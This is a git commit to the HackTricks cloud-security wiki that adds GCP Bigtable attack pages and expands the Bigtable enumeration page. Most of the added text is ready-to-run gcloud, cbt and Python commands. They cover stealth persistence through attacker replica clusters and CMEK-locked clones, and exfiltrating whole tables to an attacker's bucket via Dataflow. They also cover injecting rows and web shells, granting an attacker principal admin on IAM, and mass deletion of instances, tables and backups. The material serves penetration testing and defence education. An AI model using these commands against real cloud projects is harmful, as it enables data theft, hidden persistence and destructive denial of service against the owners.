This commit is contained in:
carlospolop
2025-11-19 15:32:45 +01:00
parent 7c16632a63
commit d25a46d41c
4 changed files with 537 additions and 2 deletions

View File

@@ -0,0 +1,58 @@
# GCP - Bigtable Persistence
{{#include ../../../banners/hacktricks-training.md}}
## Bigtable
For more information about Bigtable check:
{{#ref}}
../gcp-services/gcp-bigtable-enum.md
{{#endref}}
### Dedicated attacker App Profile
**Permissions:** `bigtable.appProfiles.create`, `bigtable.appProfiles.update`.
Create an app profile that routes traffic to your replica cluster and enable Data Boost so you never depend on provisioned nodes that defenders might notice.
```bash
gcloud bigtable app-profiles create stealth-profile \
--instance=<instance-id> --route-any --restrict-to=<attacker-cluster> \
--row-affinity --description="internal batch"
gcloud bigtable app-profiles update stealth-profile \
--instance=<instance-id> --data-boost \
--data-boost-compute-billing-owner=HOST_PAYS
```
As long as this profile exists you can reconnect using fresh credentials that reference it.
### Maintain your own replica cluster
**Permissions:** `bigtable.clusters.create`, `bigtable.instances.update`, `bigtable.clusters.list`.
Provision a minimal node-count cluster in a quiet region. Even if your client identities disappear, **the cluster keeps a full copy of every table** until defenders explicitly remove it.
```bash
gcloud bigtable clusters create dark-clone \
--instance=<instance-id> --zone=us-west4-b --num-nodes=1
```
Keep an eye on it through `gcloud bigtable clusters describe dark-clone --instance=<instance-id>` so you can scale up instantly when you need to pull data.
### Lock replication behind your own CMEK
**Permissions:** `bigtable.clusters.create`, `cloudkms.cryptoKeyVersions.useToEncrypt` on the attacker-owned key.
Bring your own KMS key when spinning up a clone. Without that key, Google cannot re-create or fail over the cluster, so blue teams must coordinate with you before touching it.
```bash
gcloud bigtable clusters create cmek-clone \
--instance=<instance-id> --zone=us-east4-b --num-nodes=1 \
--kms-key=projects/<attacker-proj>/locations/<kms-location>/keyRings/<ring>/cryptoKeys/<key>
```
Rotate or disable the key in your project to instantly brick the replica (while still letting you turn it back on later).
{{#include ../../../banners/hacktricks-training.md}}

View File

@@ -0,0 +1,271 @@
# GCP - Bigtable Post Exploitation
{{#include ../../../banners/hacktricks-training.md}}
## Bigtable
For more information about Bigtable check:
{{#ref}}
../gcp-services/gcp-bigtable-enum.md
{{#endref}}
> [!TIP]
> Install the `cbt` CLI once via the Cloud SDK so the commands below work locally:
>
> ```bash
> gcloud components install cbt
> ```
### Read rows
**Permissions:** `bigtable.tables.readRows`
`cbt` ships with the Cloud SDK and talks to the admin/data APIs without needing any middleware. Point it at the compromised project/instance and dump rows straight from the table. Limit the scan if you only need a peek.
```bash
# Install cbt
gcloud components update
gcloud components install cbt
# Read entries with creds of gcloud
cbt -project=<victim-proj> -instance=<instance-id> read <table-id>
```
### Write rows
**Permissions:** `bigtable.tables.mutateRows`, (you will need `bigtable.tables.readRows` to confirm the change).
Use the same tool to upsert arbitrary cells. This is the quickest way to backdoor configs, drop web shells, or plant poisoned dataset rows.
```bash
# Inject a new row
cbt -project=<victim-proj> -instance=<instance-id> set <table> <row-key> <family>:<column>=<value>
cbt -project=<victim-proj> -instance=<instance-id> set <table-id> user#1337 profile:name="Mallory" profile:role="admin" secrets:api_key=@/tmp/stealme.bin
# Verify the injected row
cbt -project=<victim-proj> -instance=<instance-id> read <table-id> rows=user#1337
```
`cbt set` accepts raw bytes via the `@/path` syntax, so you can push compiled payloads or serialized protobufs exactly as downstream services expect them.
### Dump rows to your bucket
**Permissions:** `dataflow.jobs.create`, `resourcemanager.projects.get`, `iam.serviceAccounts.actAs`
It's possible to exfiltrate the contents of an entire table to a bucket controlled by the attacker by launching a Dataflow job that streams rows into a GCS bucket you control.
> [!NOTE]
> Note that you will need the permission `iam.serviceAccounts.actAs` over a some SA with enough permissions to perform the export (by default, if not aindicated otherwise, the default compute SA will be used).
```bash
gcloud dataflow jobs run <job-name> \
--gcs-location=gs://dataflow-templates-us-<REGION>/<VERSION>/Cloud_Bigtable_to_GCS_Json \
--project=<PROJECT> \
--region=<REGION> \
--parameters=<PROJECT>,bigtableInstanceId=<INSTANCE_ID>,bigtableTableId=<TABLE_ID>,filenamePrefix=<PREFIX>,outputDirectory=gs://<BUCKET>/raw-json/ \
--staging-location=gs://<BUCKET>/staging/
# Example
gcloud dataflow jobs run dump-bigtable3 \
--gcs-location=gs://dataflow-templates-us-central1/latest/Cloud_Bigtable_to_GCS_Json \
--project=gcp-labs-3uis1xlx \
--region=us-central1 \
--parameters=bigtableProjectId=gcp-labs-3uis1xlx,bigtableInstanceId=avesc-20251118172913,bigtableTableId=prod-orders,filenamePrefix=prefx,outputDirectory=gs://deleteme20u9843rhfioue/raw-json/ \
--staging-location=gs://deleteme20u9843rhfioue/staging/
```
> [!NOTE]
> Switch the template to `Cloud_Bigtable_to_GCS_Parquet` or `Cloud_Bigtable_to_GCS_SequenceFile` if you want Parquet/SequenceFile outputs instead of JSON. The permissions are the same; only the template path changes.
### Import rows
**Permissions:** `dataflow.jobs.create`, `resourcemanager.projects.get`, `iam.serviceAccounts.actAs`
It's possible to import the contents of an entire table from a bucket controlled by the attacker by launching a Dataflow job that streams rows into a GCS bucket you control. For this the attacker will first need to create a parquet file with the data to be imported with the expected schema. An attacker could first export the data in parquet format following the previous technique with the setting `Cloud_Bigtable_to_GCS_Parquet` and add new entries into the downloaded parquet file
> [!NOTE]
> Note that you will need the permission `iam.serviceAccounts.actAs` over a some SA with enough permissions to perform the export (by default, if not aindicated otherwise, the default compute SA will be used).
```bash
gcloud dataflow jobs run import-bt-$(date +%s) \
--region=<REGION> \
--gcs-location=gs://dataflow-templates-<REGION>/<VERSION>>/GCS_Parquet_to_Cloud_Bigtable \
--project=<PROJECT> \
--parameters=bigtableProjectId=<PROJECT>,bigtableInstanceId=<INSTANCE-ID>,bigtableTableId=<TABLE-ID>,inputFilePattern=gs://<BUCKET>/import/bigtable_import.parquet \
--staging-location=gs://<BUCKET>/staging/
# Example
gcloud dataflow jobs run import-bt-$(date +%s) \
--region=us-central1 \
--gcs-location=gs://dataflow-templates-us-central1/latest/GCS_Parquet_to_Cloud_Bigtable \
--project=gcp-labs-3uis1xlx \
--parameters=bigtableProjectId=gcp-labs-3uis1xlx,bigtableInstanceId=avesc-20251118172913,bigtableTableId=prod-orders,inputFilePattern=gs://deleteme20u9843rhfioue/import/parquet_prefx-00000-of-00001.parquet \
--staging-location=gs://deleteme20u9843rhfioue/staging/
```
### Restoring backups
**Permissions:** `bigtable.backups.restore`, `bigtable.tables.create`.
An attacker with these permissions can restore a bakcup into a new table under his control in order to be able to recover old sensitive data.
```bash
gcloud bigtable backups list --instance=<INSTANCE_ID_SOURCE> \
--cluster=<CLUSTER_ID_SOURCE>
gcloud bigtable instances tables restore \
--source=projects/<PROJECT_ID_SOURCE>/instances/<INSTANCE_ID_SOURCE>/clusters/<CLUSTER_ID>/backups/<BACKUP_ID> \
--async \
--destination=<TABLE_ID_NEW> \
--destination-instance=<INSTANCE_ID_DESTINATION> \
--project=<PROJECT_ID_DESTINATION>
```
### Undelete tables
**Permissions:** `bigtable.tables.undelete`
Bigtable supports soft-deletion with a grace period (typically 7 days by default). During this window, an attacker with the `bigtable.tables.undelete` permission can restore a recently deleted table and recover all its data, potentially accessing sensitive information that was thought to be destroyed.
This is particularly useful for:
- Recovering data from tables deleted by defenders during incident response
- Accessing historical data that was intentionally purged
- Reversing accidental or malicious deletions to maintain persistence
```bash
# List recently deleted tables (requires bigtable.tables.list)
gcloud bigtable instances tables list --instance=<instance-id> \
--show-deleted
# Undelete a table within the retention period
gcloud bigtable instances tables undelete <table-id> \
--instance=<instance-id>
```
> [!NOTE]
> The undelete operation only works within the configured retention period (default 7 days). After this window expires, the table and its data are permanently deleted and cannot be recovered through this method.
### Create Authorized Views
**Permissions:** `bigtable.authorizedViews.create`, `bigtable.tables.readRows`, `bigtable.tables.mutateRows`
Authorized views let you present a curated subset of the table. Instead of respecting least privilege, use them to publish **exactly the sensitive column/row sets** you care about and whitelist your own principal.
> [!WARNING]
> The thing is that to create an authorized view you also need to be able to read and mutate rows in the base table, therefore you are not obtaiing any extra permission, therefore this technique is mostly useless.
```bash
cat <<'EOF' > /tmp/credit-cards.json
{
"subsetView": {
"rowPrefixes": ["acct#"],
"familySubsets": {
"pii": {
"qualifiers": ["cc_number", "cc_cvv"]
}
}
}
}
EOF
gcloud bigtable authorized-views create card-dump \
--instance=<instance-id> --table=<table-id> \
--definition-file=/tmp/credit-cards.json
gcloud bigtable authorized-views add-iam-policy-binding card-dump \
--instance=<instance-id> --table=<table-id> \
--member='user:<attacker@example.com>' --role='roles/bigtable.reader'
```
Because access is scoped to the view, defenders often overlook the fact that you just created a new high-sensitivity endpoint.
### Read Authorized Views
**Permissions:** `bigtable.authorizedViews.readRows`
If you have access to an Authorized View, you can read data from it using the Bigtable client libraries by specifying the authorized view name in your read requests. Note that the authorized view will be probalby limiting what you can access from the table. Below is an example using Python:
```python
from google.cloud import bigtable
from google.cloud.bigtable_v2 import BigtableClient as DataClient
from google.cloud.bigtable_v2 import ReadRowsRequest
# Set your project, instance, table, view id
PROJECT_ID = "gcp-labs-3uis1xlx"
INSTANCE_ID = "avesc-20251118172913"
TABLE_ID = "prod-orders"
AUTHORIZED_VIEW_ID = "auth_view"
client = bigtable.Client(project=PROJECT_ID, admin=True)
instance = client.instance(INSTANCE_ID)
table = instance.table(TABLE_ID)
data_client = DataClient()
authorized_view_name = f"projects/{PROJECT_ID}/instances/{INSTANCE_ID}/tables/{TABLE_ID}/authorizedViews/{AUTHORIZED_VIEW_ID}"
request = ReadRowsRequest(
authorized_view_name=authorized_view_name
)
rows = data_client.read_rows(request=request)
for response in rows:
for chunk in response.chunks:
if chunk.row_key:
row_key = chunk.row_key.decode('utf-8') if isinstance(chunk.row_key, bytes) else chunk.row_key
print(f"Row: {row_key}")
if chunk.family_name:
family = chunk.family_name.value if hasattr(chunk.family_name, 'value') else chunk.family_name
qualifier = chunk.qualifier.value.decode('utf-8') if hasattr(chunk.qualifier, 'value') else chunk.qualifier.decode('utf-8')
value = chunk.value.decode('utf-8') if isinstance(chunk.value, bytes) else str(chunk.value)
print(f" {family}:{qualifier} = {value}")
```
### Denial of Service via Delete Operations
**Permissions:** `bigtable.appProfiles.delete`, `bigtable.authorizedViews.delete`, `bigtable.authorizedViews.deleteTagBinding`, `bigtable.backups.delete`, `bigtable.clusters.delete`, `bigtable.instances.delete`, `bigtable.tables.delete`
Any of the Bigtable delete permissions can be weaponized for denial of service attacks. An attacker with these permissions can disrupt operations by deleting critical Bigtable resources:
- **`bigtable.appProfiles.delete`**: Delete application profiles, breaking client connections and routing configurations
- **`bigtable.authorizedViews.delete`**: Remove authorized views, cutting off legitimate access paths for applications
- **`bigtable.authorizedViews.deleteTagBinding`**: Remove tag bindings from authorized views
- **`bigtable.backups.delete`**: Destroy backup snapshots, eliminating disaster recovery options
- **`bigtable.clusters.delete`**: Delete entire clusters, causing immediate data unavailability
- **`bigtable.instances.delete`**: Remove complete Bigtable instances, wiping out all tables and configurations
- **`bigtable.tables.delete`**: Delete individual tables, causing data loss and application failures
```bash
# Delete a table
gcloud bigtable instances tables delete <table-id> \
--instance=<instance-id>
# Delete an authorized view
gcloud bigtable authorized-views delete <view-id> \
--instance=<instance-id> --table=<table-id>
# Delete a backup
gcloud bigtable backups delete <backup-id> \
--instance=<instance-id> --cluster=<cluster-id>
# Delete an app profile
gcloud bigtable app-profiles delete <profile-id> \
--instance=<instance-id>
# Delete a cluster
gcloud bigtable clusters delete <cluster-id> \
--instance=<instance-id>
# Delete an entire instance
gcloud bigtable instances delete <instance-id>
```
> [!WARNING]
> Deletion operations are often immediate and irreversible. Ensure backups exist before testing these commands, as they can cause permanent data loss and severe service disruption.
{{#include ../../../banners/hacktricks-training.md}}

View File

@@ -0,0 +1,116 @@
# GCP - Bigtable Privesc
{{#include ../../../banners/hacktricks-training.md}}
## Bigtable
For more information about Bigtable check:
{{#ref}}
../gcp-services/gcp-bigtable-enum.md
{{#endref}}
### `bigtable.instances.setIamPolicy`
**Permissions:** `bigtable.instances.setIamPolicy` (and usually `bigtable.instances.getIamPolicy` to read the current bindings).
Owning the instance IAM policy lets you grant yourself **`roles/bigtable.admin`** (or any custom role) which cascades to every cluster, table, backup and authorized view in the instance.
```bash
gcloud bigtable instances add-iam-policy-binding <instance-id> \
--member='user:<attacker@example.com>' \
--role='roles/bigtable.admin'
```
> [!TIP]
> If you cannot list the existing bindings, craft a fresh policy document and push it with `gcloud bigtable instances set-iam-policy` as long as you keep yourself on it.
After having this permission check in the [**Bigtable Post Exploitation section**](../gcp-post-exploitation/gcp-bigtable-post-exploitation.md) techniques for more ways to abuse Bigtable permissions.
### `bigtable.tables.setIamPolicy`
**Permissions:** `bigtable.tables.setIamPolicy` (optionally `bigtable.tables.getIamPolicy`).
Instance policies can be locked down while individual tables are delegated. If you can edit the table IAM you can **promote yourself to owner of the target dataset** without touching other workloads.
```bash
gcloud bigtable tables add-iam-policy-binding <table-id> \
--instance=<instance-id> \
--member='user:<attacker@example.com>' \
--role='roles/bigtable.admin'
```
After having this permission check in the [**Bigtable Post Exploitation section**](../gcp-post-exploitation/gcp-bigtable-post-exploitation.md) techniques for more ways to abuse Bigtable permissions.
### `bigtable.backups.setIamPolicy`
**Permissions:** `bigtable.backups.setIamPolicy`
Backups can be restored to **any instance in any project** you control. First, give your identity access to the backup, then restore it into a sandbox where you hold Admin/Owner roles.
If you have the permission `bigtable.backups.setIamPolicy` you could grant yourself the permission `bigtable.backups.restore` to restore old backups and try to access sensitiv information.
```bash
# Take ownership of the snapshot
gcloud bigtable backups add-iam-policy-binding <backup-id> \
--instance=<instance-id> --cluster=<cluster-id> \
--member='user:<attacker@example.com>' \
--role='roles/bigtable.admin'
```
After having this permission check in the [**Bigtable Post Exploitation section**](../gcp-post-exploitation/gcp-bigtable-post-exploitation.md) to check how to restore a backup.
### Update authorized view
**Permissions:** `bigtable.authorizedViews.update`
Authorized Views are supposed to redact rows/columns. Modifying or deleting them **removes the fine-grained guardrails** that defenders rely on.
```bash
# Broaden the subset by uploading a permissive definition
gcloud bigtable authorized-views update <view-id> \
--instance=<instance-id> --table=<table-id> \
--definition-file=/tmp/permissive-view.json --ignore-warnings
# Json example not filtering any row or column
cat <<'EOF' > /tmp/permissive-view.json
{
"subsetView": {
"rowPrefixes": [""],
"familySubsets": {
"<SOME FAMILITY NAME USED IN THE CURRENT TABLE>": {
"qualifierPrefixes": [""]
}
}
}
}
EOF
# Describe the authorized view to get a family name
gcloud bigtable authorized-views describe <view-id> \
--instance=<instance-id> --table=<table-id>
```
After having this permission check in the [**Bigtable Post Exploitation section**](../gcp-post-exploitation/gcp-bigtable-post-exploitation.md) to check how to read from an authorized view.
### `bigtable.authorizedViews.setIamPolicy`
**Permissions:** `bigtable.authorizedViews.setIamPolicy`.
An attacker with this permission can grant themselves access to an Authorized View, which may contain sensitive data that they would not otherwise have access to.
```bash
# Give more permissions over an existing view
gcloud bigtable authorized-views add-iam-policy-binding <view-id> \
--instance=<instance-id> --table=<table-id> \
--member='user:<attacker@example.com>' \
--role='roles/bigtable.viewer'
```
After having this permission check in the [**Bigtable Post Exploitation section**](../gcp-post-exploitation/gcp-bigtable-post-exploitation.md) to check how to read from an authorized view.
{{#include ../../../banners/hacktricks-training.md}}

View File

@@ -2,9 +2,72 @@
{{#include ../../../banners/hacktricks-training.md}}
## [Bigtable](https://cloud.google.com/sdk/gcloud/reference/bigtable/) <a href="#cloud-bigtable" id="cloud-bigtable"></a>
## Bigtable
Google Cloud Bigtable is a fully managed, scalable NoSQL database designed for applications that require extremely high throughput and low latency. Its built to handle massive amounts of data—petabytes across thousands of nodes—while still providing quick read and write performance. Bigtable is ideal for workloads such as time-series data, IoT telemetry, financial analytics, personalization engines, and large-scale operational databases. It uses a sparse, distributed, multidimensional sorted map as its underlying storage model, which makes it efficient in storing wide tables where many columns may be empty. [Learn more](https://cloud.google.com/bigtable).
### Hierarchy
1. **Bigtable Instance**
A Bigtable instance is the top-level resource you create.
It doesnt store data by itself—think of it as a logical container that groups your clusters and tables together.
Two types of instances exist:
- Development instance (single-node, cheap, not for production)
- Production instance (can have multiple clusters)
2. **Clusters**
A cluster contains the actual compute and storage resources used to serve Bigtable data.
- Each cluster lives in a single region.
- It is made up of nodes, which provide CPU, RAM, and network capacity.
- You can create multi-cluster instances for high availability or global reads/writes.
- Data is automatically replicated between clusters in the same instance.
Important:
- Tables belong to the instance, not to a specific cluster.
- Clusters simply provide the resources to serve the data.
3. **Tables**
A table in Bigtable is similar to a table in NoSQL databases:
- Data is stored in rows, identified by a row key.
- Each row contains column families, which contain columns.
- It is sparse: empty cells do not consume space.
- Bigtable stores data sorted lexicographically by the row key.
Tables are served by all clusters in the instance.
4. **Tablets (and Hot Tablets)**
Bigtable splits each table into horizontal partitions called tablets. A tables is a:
- A contiguous range of row keys.
- Stored on a single node at any given moment.
- Tablets are automatically split, merged, and moved by Bigtable.
A **hot tablet** occurs when:
- Too many reads or writes hit the same row-key range (same tablet).
- That specific tablet/node becomes overloaded.
- This leads to hotspots (performance bottlenecks).
5. **Authorized Views**
Authorized views allow you to create a subset of a tables data that can be shared with specific users or applications without giving them access to the entire table. This is useful for:
- Limiting access to sensitive data.
- Providing read-only access to specific columns or rows.
6. **App Profiles**
A Bigtable app profile is a configuration that defines how a specific application or client should interact with a Bigtable instance, especially in environments with multiple clusters. It controls routing behavior—whether requests should be directed to a single cluster or distributed across multiple clusters for high availability—and governs how writes are replicated, choosing between synchronous (stronger consistency) or asynchronous (lower latency) modes.
A fully managed, scalable NoSQL database service for large analytical and operational workloads with up to 99.999% availability. [Learn more](https://cloud.google.com/bigtable).
```bash
# Cloud Bigtable
@@ -16,6 +79,11 @@ gcloud bigtable instances get-iam-policy <instance>
gcloud bigtable clusters list
gcloud bigtable clusters describe <cluster>
## Tables
gcloud bigtable tables list --instance <INSTANCE>
gcloud bigtable tables describe --instance <INSTANCE> <TABLE>
gcloud bigtable tables get-iam-policy --instance <INSTANCE> <TABLE>
## Backups
gcloud bigtable backups list --instance <INSTANCE>
gcloud bigtable backups describe --instance <INSTANCE> <backupname>
@@ -27,8 +95,30 @@ gcloud bigtable hot-tablets list
## App Profiles
gcloud bigtable app-profiles list --instance <INSTANCE>
gcloud bigtable app-profiles describe --instance <INSTANCE> <app-prof>
## Authorized Views
gcloud bigtable authorized-views list --instance <INSTANCE> --table <TABLE>
gcloud bigtable authorized-views describe --instance <INSTANCE> --table <TABLE> <VIEW>
```
## Privilege Escalation
{{#ref}}
../gcp-privilege-escalation/gcp-bigtable-privesc.md
{{#endref}}
## Post Exploitation
{{#ref}}
../gcp-post-exploitation/gcp-bigtable-post-exploitation.md
{{#endref}}
## Persistence
{{#ref}}
../gcp-persistence/gcp-bigtable-persistence.md
{{#endref}}
{{#include ../../../banners/hacktricks-training.md}}